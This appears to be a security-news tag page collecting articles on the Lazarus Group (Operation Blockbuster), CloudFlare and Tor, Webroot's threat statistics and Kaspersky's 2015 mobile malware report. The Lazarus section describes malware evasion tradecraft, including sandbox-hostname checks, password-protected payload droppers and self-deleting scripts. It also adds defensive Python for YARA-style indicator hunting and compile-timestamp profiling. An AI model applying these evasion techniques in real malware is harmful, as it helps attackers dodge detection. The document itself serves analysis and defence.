
Tag: Malicious Software

Malware, short for malicious software, is any software used to disrupt computer operations, gather sensitive information, gain access to private computer systems, or display unwanted advertising. Malicious software was called computer virus before the term malware was coined in 1990 by Yisrael Radai. The first category of malware propagation concerns parasitic software fragments that attach themselves to some existing executable content. The fragment may be machine code that infects some existing application, utility, or system program, or even the code used to boot a computer system. Malware is defined by its malicious intent, acting against the requirements of the computer user, and does not include software that causes unintentional harm due to some deficiency.

Malware may be stealthy, intended to steal information or spy on computer users for an extended period without their knowledge, as for example Regin, or it may be designed to cause harm, often as sabotage (e.g., Stuxnet), or to extort payment (CryptoLocker). ‘Malware’ is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, trojan horses, ransomware, spyware, adware, scareware, and other malicious programs. It can take the form of executable code, scripts, active content, and other software. Malware is often disguised as, or embedded in, non-malicious files. As of 2011 the majority of active malware threats were worms or trojans rather than viruses.

Operation Blockbuster revealed

Kaspersky Lab has joined an industry alliance driven by Novetta to announce Operation Blockbuster. Just like the previous Operation SMN, this alliance brings together key players in the IT security industry, working together in an effort to disrupt and neutralize multiple cyberespionage campaigns that have been active for several years. Some of the targets of these campaigns included financial institutions, media houses and manufacturing companies, among others. In the past, we published our research into the malware that was publicly attributed to the Sony Pictures (SPE) hack.

Building on that data, Kaspersky Lab conducted more focused research into a cluster of related campaigns stretching back several years before the SPE incident.

That cluster involves several malware families as well as campaigns that have not received media attention and were previously considered unrelated.

By focusing primarily on instances of code-reuse and leveraging the power of Yara, Kaspersky researchers were able to proactively spot new malware variants produced by the same threat actor, codenamed by Novetta ‘The Lazarus Group’.

For instance, past and current activity that we attribute to the Lazarus Group includes Wild Positron, which is also known publicly as Duuzer. Some of our findings about Wild Positron and other associated operations were initially presented to a select audience at our Security Analyst Summit (SAS) in Tenerife, Spain, through a joint presentation between researchers from Kaspersky’s Global Research and Analysis Team and AlienVault Labs’ Research Team.

Today, as part of Operation Blockbuster, together with Novetta and other industry partners, we are publishing our findings for the benefit of the wider public.

Technical highlights of SAS findings

The Lazarus Group’s activity spans multiple years, going back as far as 2009. However, their activity spikes starting with 2011.

The group deployed multiple malware families throughout the years, including malware associated with Operation Troy and DarkSeoul, the Hangman malware (2014-2015) and Wild Positron / Duuzer (2015).

The group is known for spearphishing attacks, including CVE-2015-6585, which was a zero-day vulnerability at the time of discovery. During our analysis of the malware from the SPE attack as well as the connected malware families mentioned above, we observed certain specific traits shared between samples used in separate attacks.

In general, such similarities are instances of code sharing and indicate the existence of a relationship between the malware families, which can be used to paint a more complete picture of a threat actor. We describe some of these overlapping features below.

Network functionality

Rather than focus on the specific functionality of any given piece of malware, we focused on hunting for as many related malware samples as possible in order to better understand the practices of this threat actor. Studying multiple coding quirks within any given malware variant actually revealed these to be coding conventions implemented across both different malware families and entirely new samples.

A simple example of code reuse is the networking functionality that includes a half-dozen hard-coded user-agents with the misspelling ‘Mozillar’ instead of Mozilla.

Figure: Misspelled hardcoded user-agent

This same user-agent appears across a variety of malware families including the original Destover as well as multiple loosely related variants of Hangman, a new campaign targeting Domain Controllers, and the Sconlog/SSPPMID samples.

Self-deleting scripts

Figure: Placeholder strings in the dropper (left) and the resulting self-delete BAT file (right)

Another interesting convention is the use of BAT files to delete components of the malware after infection.

These BAT files are generated on the fly and, while they serve their purpose of eliminating initial infection traces, they ironically double as a great way to identify the malware itself by homing in on the path-placeholder strings that generate the randomly-named BAT files on the infected systems.

This convention is found across the widest range of Hangman/Volgmer variants as well as a wealth of thus-far uncategorized samples stretching back as far as 2012/2013.

Basic anti-analysis techniques

Figure: Password-protected ZIP resource containing malware payload

A high-confidence indicator of correlation is the reuse of a shared password across malware droppers used to drop different malware variants.

The droppers all kept their payloads within a password-protected ZIP under the resource name ‘MYRES’.

The dropper contains the hardcoded password ‘!1234567890 dghtdhtrhgfjnui$%^^&fdt‘ making it trivially easy for an analyst to reach the payload.

The purpose, of course, is not to stymie seasoned analysts but to halt automated systems from extracting and analyzing the payload.

Avid watchers

Figure: Hardcoded sandbox hostnames in latest iterations of the Lazarus Group malware

The target of this investigation is far from unaware of the efforts of security practitioners and AV vendors interested in their practices.

Apart from including simple anti-analysis techniques, the Lazarus group’s latest malware now include a custom-tailored list of computer hostnames to watch out for.

These hostnames belong to sandbox execution systems that likely execute their malware routinely for the sake of generating detections. Lists of sandbox names have been made available on attacker forums or in open blog posts.

The interesting thing is that the Lazarus group’s list of sandbox hostnames includes the following:

‘XELRCUZ-AZ’
‘RATS-PC’
‘PXE472179’

These are three presumed sandbox hostnames not found in any public lists we’ve been able to identify.

The attackers most likely collected these during the execution of their malware and decided to retaliate by adding logic to avoid execution on these systems.
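As an added example (this code is not from the Kaspersky post, from Novetta, or from any Operation Blockbuster tooling), the Python script below shows the kind of string-based code-reuse hunting described above: it pulls printable ASCII and UTF-16LE strings out of a binary, flags the ‘Mozillar’ user-agent token and the three sandbox hostnames listed above, reports that every variant still carries a distinct hash, and emits an equivalent YARA rule for scaling the hunt. The three sample blobs are constructed stand-ins, not real malware, and the rule name, function names and the minimum string length are assumptions rather than values from the report.

```python
import hashlib
import re

# Indicators taken from the post above: the misspelled "Mozillar" user-agent
# token shared across families, and the three sandbox hostnames the latest
# Lazarus samples refuse to run on.
USER_AGENT_TOKEN = "Mozillar"
SANDBOX_HOSTNAMES = ["XELRCUZ-AZ", "RATS-PC", "PXE472179"]


def extract_strings(blob, min_len=4):
    """Return the printable ASCII and UTF-16LE strings of at least min_len
    characters found in blob (a plain substitute for the `strings` tool)."""
    ascii_pat = rb"[\x20-\x7e]{%d,}" % min_len
    wide_pat = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    found = {m.group().decode("ascii") for m in re.finditer(ascii_pat, blob)}
    found |= {m.group().decode("utf-16le") for m in re.finditer(wide_pat, blob)}
    return found


def match_indicators(blob):
    """Name every shared-code indicator present in the sample."""
    strings = extract_strings(blob)
    hits = []
    if any(USER_AGENT_TOKEN in s for s in strings):
        hits.append("misspelled_user_agent")
    for host in SANDBOX_HOSTNAMES:
        if any(host in s for s in strings):
            hits.append("sandbox_hostname:" + host)
    return hits


def cluster_samples(samples):
    """samples: {name: bytes}. Returns {name: (sha256, [indicators])}.
    The hash is unique per variant; the indicator list is what links them."""
    return {name: (hashlib.sha256(blob).hexdigest(), match_indicators(blob))
            for name, blob in samples.items()}


def yara_rule(name="lazarus_shared_strings"):
    """Emit an equivalent YARA rule (assumed rule name) for the same hunt."""
    lines = [f"rule {name}", "{", "    strings:",
             f'        $ua = "{USER_AGENT_TOKEN}" ascii wide']
    for i, host in enumerate(SANDBOX_HOSTNAMES):
        lines.append(f'        $host{i} = "{host}" ascii wide')
    lines += ["    condition:", "        any of them", "}"]
    return "\n".join(lines)


# Constructed stand-ins for three binaries (not real malware): two variants
# that share the conventions described above, one unrelated benign file.
SAMPLES = {
    "variant_a": b"\x00" * 32
                 + b"Mozillar/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
                 + b"\xcc" * 16,
    "variant_b": b"\x00" * 32
                 + "Mozillar/5.0".encode("utf-16le")  # same token as a wide string
                 + b"\xcc" * 8 + b"RATS-PC\x00" + b"\xcc" * 8,
    "benign":    b"\x00" * 32
                 + b"Mozilla/5.0 (Windows NT 10.0)" + b"\xcc" * 16,
}

if __name__ == "__main__":
    for name, (digest, hits) in cluster_samples(SAMPLES).items():
        print(f"{name:10} sha256={digest[:16]}... indicators={hits}")
    print(yara_rule())
```

Run against a real sample set, the hashes will all differ while the indicator lists group the related variants together, which is exactly why code-reuse strings are the better pivot; a string like a misspelled user-agent can still appear in unrelated or imitation samples, so a hit is a lead for triage rather than attribution on its own.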

This displays a level of awareness of an attacker that is cognizant of the playing field and adapting to outwit their adversaries in the security industry.

Attacker activity

Profiling the PE compilation timestamps can provide security researchers with a method to identify the attacker’s activity throughout the years.

This can be used to understand if the group’s efforts are increasing, decreasing or if certain blind spots exist. Based on the analysis of several samples that we strongly associated with the group, we conclude the activity has been steadily growing since 2013. Analysis of the working hours provides a possibly even more interesting picture: the group appears to start working around midnight (00 hrs GMT) and breaks for lunch around 3am GMT.

Considering normal working hours, this indicates the attackers are probably located in a timezone of GMT+8 or GMT+9. What is perhaps most surprising is the amount of sleep they get – roughly 6-7 hours per night.

This indicates a very hard working team, possibly more hard working than any other APT group we’ve analysed.

Language usage and attribution

Of course, one of the top questions here is who is behind the Lazarus group and is it a nation-state sponsored attacker? Instead of speculating on the origin of these attacks, we prefer to provide technical facts and let the reader draw their own conclusions. Out of the Lazarus group reference sample set compiled by our partner Novetta, just over 60% (61.9%) of them have at least one PE resource with Korean locale or language. The analysis of the metadata extracted from several thousand samples shown above seems to indicate the attackers are probably located in a timezone of GMT+8 or GMT+9. Additionally, many of the attacks in the past seemed to target institutions in South Korea, such as in the case of DarkSeoul.
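As an added example rather than Kaspersky’s own tooling, the Python below performs the compilation-timestamp profiling described above: it reads the COFF TimeDateStamp from each PE header, builds a per-hour histogram in UTC, and derives a probable UTC offset and break hour from the busy block. The PE images and the build schedule are constructed for the demonstration, the assumption that the first busy hour corresponds to a 09:00 local start is mine and not the report’s, and the helper names and the 25% busy-hour threshold are likewise assumptions.

```python
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone


def build_min_pe(timestamp):
    """Construct a minimal, non-loadable PE image whose COFF header carries the
    given TimeDateStamp. Stands in for real samples so the code runs offline."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 0, 0x0102)
    return dos_header + b"PE\x00\x00" + coff


def pe_timestamp(data):
    """Read the COFF TimeDateStamp (seconds since the Unix epoch, UTC)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def hourly_profile(samples):
    """Count builds per UTC hour of day. Zeroed stamps carry no information."""
    hist = Counter()
    for blob in samples:
        ts = pe_timestamp(blob)
        if ts == 0:
            continue
        hist[datetime.fromtimestamp(ts, tz=timezone.utc).hour] += 1
    return hist


def busy_hours(hist, frac=0.25):
    """UTC hours with at least frac of the peak hour's builds, in workday order.
    The block may wrap past 23:00 UTC, so the hour following a gap comes first."""
    if not hist:
        return []
    peak = max(hist.values())
    busy = {h for h, c in hist.items() if c >= frac * peak}
    starts = [h for h in sorted(busy) if (h - 1) % 24 not in busy]
    h = starts[0] if starts else min(busy)
    ordered = []
    while h in busy and len(ordered) < 24:
        ordered.append(h)
        h = (h + 1) % 24
    return ordered


def infer_utc_offset(hist, local_start_hour=9):
    """Assumption: the first busy UTC hour is the team's local_start_hour.
    Returns whole hours east of UTC (negative for west)."""
    block = busy_hours(hist)
    if not block:
        return None
    offset = (local_start_hour - block[0]) % 24
    return offset - 24 if offset > 12 else offset


def break_hour(hist):
    """The quietest hour strictly inside the busy block: a lunch-style dip."""
    inner = busy_hours(hist)[1:-1]
    return min(inner, key=lambda h: hist[h]) if inner else None


# Constructed build schedule (not real sample data): 20 working days with builds
# from 00:00 to 08:59 UTC and a dip at 03:00 UTC, mirroring the pattern above.
BUILDS_PER_UTC_HOUR = {0: 4, 1: 4, 2: 4, 3: 1, 4: 3, 5: 3, 6: 3, 7: 3, 8: 2}


def constructed_samples():
    samples = [build_min_pe(0)]  # one zeroed stamp, which the profile skips
    day = datetime(2015, 1, 5, tzinfo=timezone.utc)
    for d in range(20):
        for hour, n in BUILDS_PER_UTC_HOUR.items():
            for i in range(n):
                t = day + timedelta(days=d, hours=hour, minutes=7 * i)
                samples.append(build_min_pe(int(t.timestamp())))
    return samples


if __name__ == "__main__":
    hist = hourly_profile(constructed_samples())
    for h in range(24):
        print(f"{h:02d}:00 UTC {'#' * hist[h]}")
    print("likely offset UTC%+d, break at %02d:00 UTC"
          % (infer_utc_offset(hist), break_hour(hist)))
```

Compilation timestamps are attacker-controlled and are sometimes zeroed or forged, so the inferred offset is corroborating evidence to set beside resource locales and targeting, not a finding on its own; the offset is also only as good as the assumed start-of-day, which is why it is a parameter.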

Coupled with the attackers’ use of a Hangul Word Processor zero-day, this also seems to indicate that South Korea is one of their top interests.

Victim information

Based on KSN analysis and reports, we were able to put together a map with the regions and countries most affected by the Lazarus group malware.

To create the map, we took the reference samples set from Novetta, removed the shared hacking tools (such as Process Hacker) and cross referenced them with KSN detections from the last twelve months.
It should be noted that due to the large amount of samples (more than 1000), these detections can include researchers analysing the malware as well as multi-scanners or victims connecting by VPNs.

Additionally, for such a large number of samples and detections, the geography can be influenced by the geographical popularity/distribution of Kaspersky Lab products; for instance, while many of the Lazarus group attacks were directed at targets in South Korea, our customer base there is relatively small and doesn’t offer a solid perspective on the infections there. Finally, some of the malware from the Lazarus group appears to be self-spreading (worms) which affect the overall statistics if we look at it from a targeted attacks point of view. Nevertheless, these statistics provide an overall image of Lazarus group malware detections as observed by our products over the last 12 months.

Conclusions

Our research into the Lazarus group conducted over the past several years confirms the existence of a connection between various campaigns such as Operation DarkSeoul, Operation Troy and the SPE, which we believe to be fitting under the umbrella of a single threat actor.

Their focus, victimology, and guerrilla-style tactics indicate a dynamic, agile and highly malicious entity, open to data destruction in addition to conventional cyberespionage operations. During the last two years, the number of destructive attacks has grown considerably. We’ve written about some of them in our blog ‘Five Wipers in the Spotlight’.

As observed in these incidents, this kind of malware proves to be a highly effective type of cyber-weapon.

The power to wipe thousands of computers at the push of a button represents a significant bounty to a CNE team tasked with disinformation and the disruption of a target enterprise.
Its value as part of hybrid warfare, where wiper attacks are coupled with kinetic attacks to paralyze a country’s infrastructure remains an interesting thought experiment closer to reality than we can be comfortable with. As we predicted, the number of wiper attacks grows steadily.
It will continue to rise exponentially as media and governments respond in a way that raises the profile of the perpetrators in a politically beneficial manner. Millions of dollars in losses, disabled operational capabilities, and reputational loss will continue to haunt the victims in the wake of the Lazarus group and other actors willing to perpetrate these devastating attacks. Together with our industry partners, we are proud to put a dent in the operations of an unscrupulous actor willing to leverage these devastating techniques.

Kaspersky PR page
Novetta PR page

Indicators of Compromise (IOCs)

Novetta has put together a website with IOCs and Yara rules related to the Lazarus group. You can grab them here:

Indicators
STIX file (this file provided courtesy of CERT Australia, www.cert.gov.au)
YARA signatures
Large CSV of Family Hashes

Bar to 'malicious attack traffic' may be lowered Tor users crying over CloudFlare's CAPTCHAs will soon be able to put away their onions, the company has suggested. CloudFlare's CEO, Matthew Prince, told The Register that he would love to create a no-more-tears system allowing the network's legitimate users to access websites without being hit by buggy Turing tests, while also protecting his customers' sites from abuse. Tor, which allows individuals to use the internet without spaffing identifying information at the TCP/IP level, is highly prized by privacy activists.
It unfortunately also provides miscreants with a valuable layer of protection, with their use of it allegedly accounting for more than 90 per cent of the network's traffic. While definitive figures on the degree to which the network is used abusively are unavailable, its supporters have complained that CloudFlare – which provides CDN and/or DNS services for over a million websites – has allowed those customers to implement CAPTCHAs which are purposefully designed to hamper Tor users' anonymous access to the web. CloudFlare has always denied this.

An FAQ on its support site states that the company “does not actively block visitors who use the Tor network.” It adds, however, that “due to the behaviour of some individuals using the Tor network (spammers, distributors of malware, attackers, etc.), the IP addresses of Tor exit nodes generally earn a bad reputation.” As such, CloudFlare's basic protection level – which is set by customers – issues “CAPTCHA-based challenges to visitors whose IP address has a high threat score.” Prince told The Register: “You have to acknowledge the complaints that Tor users have.
It's made browsing the internet much more difficult for Tor users, and we hate that.” The CEO is not alone in hating it.

A bug tracker ticket opened yesterday by one of the Tor project's most well-known evangelists, Jacob Appelbaum, alleged that companies such as CloudFlare “are effectively now Global Active Adversaries.” CloudFlare, according to Appelbaum, “actively make it nearly impossible to browse to certain websites, they collude with larger surveillance companies (like Google), their CAPTCHAs are awful, they block members of our community on social media rather than engaging with them and frankly, they run untrusted code in millions of browsers on the web for questionable security gains.” Comments in the Tor Project's trac page, however, show that Appelbaum is not alone in his criticism.
Vituperative members of the Tor community declared their dislike of CloudFlare in the thread, saying that it gathers metrics which "count as a kind of surveillance that is seemingly linked with a PRISM provider," as Appelbaum described CloudFlare's use of Google's CAPTCHAs. Prince denied this to The Register, saying: “If you sat at CloudFlare and listened to how much we're supportive of communities like Tor internally, it's hard to make that same claim.” The CEO also disagreed with another of Appelbaum's allegations – that the company isn't interested in engaging in a dialogue with the Tor project – though he stressed his respect for Appelbaum himself, whom he regards as “a very smart guy.” “Our customers are website owners,” Prince added, “and if you survey them ask what they think about Tor, they would rather just block it in most cases.

The reason why is because an enormous amount of abuse comes via Tor.” According to Prince, third-party figures have suggested that more than 90 per cent of Tor traffic – in voluminous terms – “is, in some way, per se abusive, and I don't mean that in terms of visiting distasteful sites, that's not our business, but is traffic that is actively trying to hurt the websites it is visiting.” CloudFlare's CTO responded to Appelbaum's “Global Active Adversary” claim, criticising it for being an “inflammatory introduction” before clarifying that CloudFlare is "not adversarial to TOR as an entity, we are trying to deal with abuse that uses the TOR network.” Malicious traffic arriving via a Tor exit node is indistinguishable from legitimate traffic, as those using the Tor Browser Bundle share the exact same user agent and IP range.

The alternative to blocking outright is a CAPTCHA: a small Turing test that distinguishes human visitors from email-address-scraping bots. Concurring with Prince's comments about engaging with the Tor Project, the CTO asserted that the company has had “multiple contacts with people working on Tor through events like Real World Crypto and have been trying to come up with a solution that will protect web sites from malicious use of Tor while protecting the anonymity of Tor users (such as myself).” Prince also told El Reg that his company offered "six or seven" of its 125 engineers to work with the Tor project.

Among the active Tor users at the company are the CTO, and Ryan Lackey, known for previously founding the Sultanate of Kinakuta-like Sealand-based HavenCo and joining CloudFlare when his company, CryptoSeal, was acquired in 2014, as well as “at least 20 others.” "About a month ago, I blacklisted every single IP address that was used in the CloudFlare office network, so our own team had to pass the CAPTCHAs too, so we had to feel the same pain, and it is a pain in the ass," added Prince. There have been bugs in the CAPTCHA system too, Prince added, forcing Tor users to have to pass the CAPTCHA more than once per site. "We just see a tonne of abuse coming from those IP addresses," said Prince, "and our system says it's statistically probable that this is abusive." CloudFlare is working on making things easier, however.

The CEO told us that, "for the first time, we're allowing our customers to apply their own rules to Tor exit nodes." The company will soon allow customers to whitelist Tor exit nodes. "What I worry about," said Prince, "was that I could not think of a philosophically justifiable reason to allow the whitelisting of Tor exit nodes and not the blacklisting of Tor exit nodes. We are just allowing customers to whitelist them, but I think a majority of site owners would rather blacklist them." “I was at a hosting conference recently and somebody stood up and said, ‘I want to ask you something specifically about Tor’ and somebody from the EFF stood up and said it was my question too.

And then the person asked “When will you allow us to block Tor entirely?” and the EFF guy was like “Wow, I never appreciated how much malicious stuff the average website owner sees coming off of the network.” The Tor Project does not explicitly accept that it facilitates additional abuse.
Its Abuse FAQ repeatedly states variations on the theme of: "So yes, criminals could in theory use Tor, but they already have better options, and it seems unlikely that taking Tor away from the world will stop them from doing their bad things.

At the same time, Tor and other privacy measures can fight identity theft, physical crimes like stalking, and so on." Prince agreed with the principle that Tor was a legitimate service and said that the company has "tried to feel the pain of those users too. We're trying to be as empathetic as possible to those challenges.

But our customers are saying something else." "If there's a technical way to do it, we're interested," said Prince, regarding a means of enabling the legitimate use of Tor while protecting customers. He suggested moving "the proof-of-work problem to their side" might help. “I'd love to be able to work with the Tor community to come up with one solution,” added Prince. Potential solutions are being debated by the Tor community on the trac page.

Disclosure: The Register is a CloudFlare customer. Our security settings require CAPTCHAs be completed by those coming from “possibly malicious IP ranges” for the reasons stated above. While we apologise for any inconvenience this causes, it remains a useful security mechanism.

Nearly 97 percent of malware encountered on users' computers is unique, as criminals automatically generate variants in order to stymie defensive software. Every snowflake may be unique, but now, so is nearly every piece of malware, according to the latest report by security firm Webroot. Last year, 97 percent of malware encountered by potential victims was a unique variant, the culmination of a trend that started more than a half decade ago, the company stated in its Webroot 2016 Threat Brief. While no antivirus company relies only on signatures—also known as "hashes"—to detect malware, slightly modifying the malicious programs to foil the first line of defense is an easy step for attackers, Grayson Milbourne, security intelligence director for Webroot, told eWEEK. "From a hash perspective, each of those threats are unique to that particular endpoint," he said. "Those threats were only seen on the endpoint that recorded it." Overall, the amount of malware seen by end users appears to be leveling off. Webroot detected only a slight increase in malware as a proportion of all unique files executed by its users.

The number of potentially unwanted software programs blocked by Webroot, however, declined by almost half.
In part, the drop is likely due to efforts by the Clean Software Alliance, a group dedicated to preventing unwanted software installs. "Because of the Clean Software Alliance, companies are doing a better job of leading people toward the legitimate source [of a desired program]," he said. "So the bad acting, pay-per-install groups are realizing that, if they are going to thrive, they have to act more like malware and evade detection. We see them using the same techniques now as most malware." Webroot, however, saw a dramatic increase in the number of new Internet addresses from which malicious attacks came. On average, nearly 100,000 new Internet addresses showed signs of malicious behavior each day, making up about 40 percent of the 250,000 addresses showing daily signs of malicious activity, Milbourne said. "There is an increased migration into the unused, and otherwise thought-to-be-benign, IP space, which is a reaction by cyber-criminals as they try to stay ahead of Web companies," he said. The trend appears to be a sign that criminals are moving away from using the same sites and systems for malicious activity.
In 2014, Webroot detected malicious activity 46 times from the average IP address on its top 10,000 list of malicious actors.
In 2015, the frequency dropped to 18 times a year, Milbourne said. "We track the top 10,000 IP addresses and how often we see malicious activity there," he said. "We have seen a drop in the number of times we see malicious activity from those addresses." Many of the sites are used as a destination for phishing victims. Webroot found that phishing attacks were twice as likely to masquerade as a technology company than as a financial firm.

Google, Dropbox and Yahoo topped the list of technology firms whose credentials attackers sought, Milbourne said. "You would think that financial would be the target, but the technology companies provide more net value because if I can break into your email account at Google, I can then figure out what value you have," he said.

Hewlett Packard Enterprise (HPE) released its 2016 Cyber Risk Report on Feb. 17, providing statistics and some analysis on security trends for the past year. While some things have changed over the course of the last year, many others have not.

Among t...
In February 2014, thousands of Asus router owners found a disturbing text file saved to their devices. "This is an automated message being sent out to everyone effected [sic]," the message read. "Your Asus router (and your documents) can b...

Mobile malware evolution 2015

The year in figures

In 2015, Kaspersky Lab detected the following:

2,961,727 malicious installation packages
884,774 new malicious mobile programs – a threefold increase from the previous year
7,030 mobile banking Trojans

Trends of the year

Rise in the number of malicious attachments the user is unable to delete.
Cybercriminals actively using phishing windows to conceal legitimate apps.
Growth in the volume of ransomware.
Programs using super-user rights to display aggressive advertising.
Increase in the quantity of malware for iOS.

Main methods of monetization

Mobile malware continues to evolve towards monetization, with malware authors trying to ensure their creations are capable of making money from their victims.

Stealing money from user bank accounts

Mobile Trojans targeting user bank accounts continue to develop – in 2015, we detected 7,030 new mobile banking Trojans. Some malicious mobile programs work in combination with Windows-based Trojans to capture mTAN passwords (one-time passwords used in two-factor authentication) that are used for authorizing bank transactions. Many of the other mobile programs used to steal money from user bank accounts operate independently. Some mobile malware is capable of overlaying the on-screen display of a legitimate banking app with that of a phishing window that imitates the app.

The most notable examples of this type of program are Trojan-SMS.AndroidOS.OpFake.cc and the representatives of the Trojan-Banker.AndroidOS.Acecard family. One of the OpFake.cc modifications can imitate the interface of more than 100 legitimate banking and finance apps.

The Acecard family can imitate at least 30 banking apps and also has functionality to overlay any app that the C&C server commands. In Q2 2015, we wrote about Trojan-Spy.AndroidOS.SmsThief.fc whose malicious code was embedded in a legitimate banking app without affecting its performance.

This meant it was highly unlikely a user would notice the malware. The authors of mobile malware are taking an increasingly integrated approach to stealing money: it is no longer limited to special banking Trojans targeting banking apps. An example of this approach is Trojan-SMS.AndroidOS.FakeInst.ep. What the users see is a message, purportedly from Google, demanding that they open Google Wallet and go through an ‘identification’ procedure that involves entering their credit card details (one of the reasons given is the need to combat cybercrime).

The window cannot be removed until the victim enters their credit card details. Once users enter the required data, it is sent to attackers, and the window closes. Meanwhile, the Trojan continues to steal information and send additional information to its owners about the smartphone and its user. Against a background of slowing growth in the number of specialized banking Trojans, the total number of apps that can steal money from users is growing.

This comes at a time when banking Trojans are becoming more sophisticated and versatile – they are often capable of attacking customers of dozens of banks located in a variety of countries.

This means cybercriminals do not need lots of different files to attack the customers of different banks.

Ransomware

The number of Trojan-Ransom families doubled in 2015 compared to the previous year, while the number of detected modifications increased 3.5 times.

This means some criminals are switching to ransomware to steal money, and those who were already doing so are continuing to create new versions of the malware. Yet another key indicator confirming the importance of this class of threat is the number of people who were attacked: in 2015, this figure increased fivefold. In most cases when these Trojans block a device, the user is accused of committing some alleged misdemeanor, and has to pay to unblock the device – the ransom can range from $12 to $100.

The blocked device is rendered inoperable – the user only sees a window with the ransom demand. Some Trojans are capable of overlaying system dialog boxes, including those used to switch off the phone.

Figure: The window opened by Fusob

At the end of the year we detected several Trojan downloaders that downloaded Trojan-Ransom.AndroidOS.Pletor in the system.

These Trojan downloaders exploit vulnerabilities in the system to gain super-user privileges on the device and install Trojan-Ransom malware in the system folder. Once installed, this Trojan is almost impossible to remove. SMS Trojans remained a serious threat, particularly in Russia.

These programs send paid text messages from an infected device without the user being aware.

Although their share in the overall flow of mobile threats continues to decline, the number of SMS Trojans in absolute terms remains substantial. Some SMS Trojans are not limited to the sending of text messages to premium numbers; they can also connect the user to paid subscriptions.
In 2015, we kept track of how Trojan-SMS.AndroidOS.Podec – still one of the most popular Trojans among cybercriminals – was developing.

This Trojan boasts an unusual feature: its main method of monetization is paid subscriptions.
It is capable of bypassing Captcha, and its latest modifications have “lost” the ability to send text messages as its creators have focused on subscriptions.

Aggressive advertising

In 2015, we recorded an increase in the number of programs that use advertising as the main means of monetization.

The trend of the year was Trojans using super-user privileges.
In the first quarter of 2015, the mobile malware TOP 20 contained just one Trojan of this type; by the end of the year they made up more than half of the rating.

Although these Trojans are only designed to download and install advertising applications without the user’s knowledge, they can cause a lot of problems. Once installed, they try to root the device and install their own components in the system, making them difficult to remove. Some of them remain on a smartphone even after resetting to factory settings.

As a result, the user is inundated with annoying ads on the device.

They can also install lots of other programs, including malware, on the device without the user being aware.

There have been cases of this type of program being distributed in the official firmware of devices or being pre-installed on new phones.

Malware in official stores

In early October 2015 we came across several Trojans in the official Google Play Store that stole user passwords from the Russian social network VKontakte.

These were Trojan-PSW.AndroidOS.MyVk.a and Trojan-PSW.AndroidOS.Vkezo.a.

About a month later we detected a new modification of the Trojan Vkezo which was also distributed via Google Play Store.

The attackers published these Trojans 10 times in the official app store under different names over a period of several months.

The number of downloads for all versions of these Trojans was put at between 100 000 and 500 000. Yet another Trojan detected in Google Play Store was Trojan-Downloader.AndroidOS.Leech; it was also downloaded between 100 000 and 500 000 times.

Malware for iOS

In 2015, the number of malicious programs for iOS increased 2.1 times compared to 2014. The recent emergence of malicious apps in the App Store once again demonstrated that, contrary to popular belief, iOS is not invulnerable to malware.

The attackers did not hack the App Store, but instead posted a malicious version of Apple’s Xcode, a free set of tools that developers use to create applications for iOS, on the Internet. Xcode is officially distributed by Apple, but it is also unofficially spread by third parties. Some Chinese vendors prefer to download the development tools from local servers. Someone posted an Xcode version containing the malicious XcodeGhost code on a third-party server in China. Malicious code is embedded in any application compiled using this version of Xcode. XcodeGhost infected dozens of applications.
Initially it was thought that 39 infected apps had bypassed the Apple testing procedure and had been successfully downloaded to the App Store.

The most popular of them was WeChat, a free messenger installed on more than 700 million user devices.

Apple removed the infected apps. However, the hacked version of Xcode was available for about six months, so the total number of infected applications might be much higher, not least because the source code for XcodeGhost was published on GitHub.

In early June, Trojan.IphoneOS.FakeTimer.a, a malicious program for iPhone, was detected.

The Trojan targets users in Japan and can be installed on any iPhone because the attackers used an enterprise certificate to sign the Trojan.

The malicious program uses phishing techniques to steal money.

A similar version of the Trojan for Android – Trojan.AndroidOS.FakeTimer.a.that – has already been around for several years.

Statistics

In 2015, the volume of mobile malware continued to grow.

From 2004 to 2013 we detected nearly 200,000 samples of malicious mobile code.
In 2014 there were 295,539 new programs, while the number was 884,774 in 2015.

These figures do not tell the whole story because each malware sample has several installation packages: in 2015, we detected 2,961,727 malicious installation packages. From the beginning of January till the end of December 2015, Kaspersky Lab registered nearly 17 million attacks by malicious mobile software and protected 2,634,967 unique users of Android-based devices.

The number of attacks blocked by Kaspersky Lab solutions, 2015

The number of users protected by Kaspersky Lab solutions, 2015

Geography of mobile threats

Attacks by malicious mobile software were recorded in more than 200 countries.

The geography of mobile threats by number of attacked users, 2015

The number of recorded attacks greatly depends on the number of users in a country.

To evaluate the danger of infection by mobile malware in various countries we calculated the percentage of our users who encountered malicious applications in 2015.

TOP 10 countries by the percentage of attacked users

    Country        % of attacked users*
 1  China          37
 2  Nigeria        37
 3  Syria          26
 4  Malaysia       24
 5  Ivory Coast    23
 6  Vietnam        22
 7  Iran           21
 8  Russia         21
 9  Indonesia      19
10  Ukraine        19

* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** The percentage of attacked unique users as a percentage of all users of Kaspersky Lab mobile security products in the country.

China and Nigeria topped the ranking, with 37% of users of Kaspersky Lab mobile security products in those countries encountering a mobile threat at least once during the year. Most of the attacks on users in Nigeria were carried out by advertising Trojans such as the Ztrorg, Leech, and Rootnik families that make use of super-user privileges, as well as by adware. In China, a significant proportion of the attacks also involved advertising Trojans, but the majority of users encountered the RiskTool.AndroidOS.SMSreg family.

Careless use of these programs can lead to money being withdrawn from a mobile account.

Types of mobile malware

Over the reporting period, the number of new AdWare and RiskTool files detected grew significantly.

As a result, their share in the distribution of new mobile malware by type also increased noticeably – from 19.6% and 18.4% to 41.4% and 27.4%, respectively.

Distribution of new mobile malware by type in 2014 and 2015

When distributing adware programs, rather primitive methods are used to attract the attention of users to the advertisements: apps are created using the icons and names of popular games or useful programs. Of course, there are lots of popular games and legitimate applications, so a lot of fake advertising apps can be generated.

